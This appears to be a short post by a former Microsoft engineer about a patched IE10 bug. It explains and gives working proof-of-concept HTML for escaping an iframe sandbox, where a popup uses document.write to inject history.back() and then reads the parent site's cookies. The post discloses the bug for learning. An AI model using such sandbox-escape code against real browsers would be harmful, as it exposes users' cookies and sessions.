This one surprised me. A sandboxed iFrame with allow-popups allow-scripts can open a new window which inherits the sandbox. But the new window can call document.write to inject a history.back() script, and once the navigation fires the sandbox context gets dropped entirely.

<!-- index.html -->
<iframe sandbox="allow-popups allow-scripts" src="sandboxed.html" width="300" height="50"></iframe>
<script>
document.cookie = "COOKIE WAS SET BY THE MAIN NON-SANDBOXED WINDOW";
</script>
<!-- sandboxed.html: inside the sandbox, opens an unsandboxed-looking window -->
<a href="outofsandbox.html" target="_blank">Open a new sandboxed window</a>
<!-- outofsandbox.html: tries to read cookies; if blocked, writes a back-navigation script -->
<script>
try {
    alert("document.cookie:\n" + document.cookie);
} catch (e) {
    setTimeout("document.write('<script>history.back();<\/script>');", 1000);
}
</script>

The trick is in outofsandbox.html: it first tries to read document.cookie — which fails under the sandbox — then catches the error and writes a history.back() call via document.write. After the navigation fires, the window is no longer sandboxed and can read cookies freely. Tested on Win8 RP IE10.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.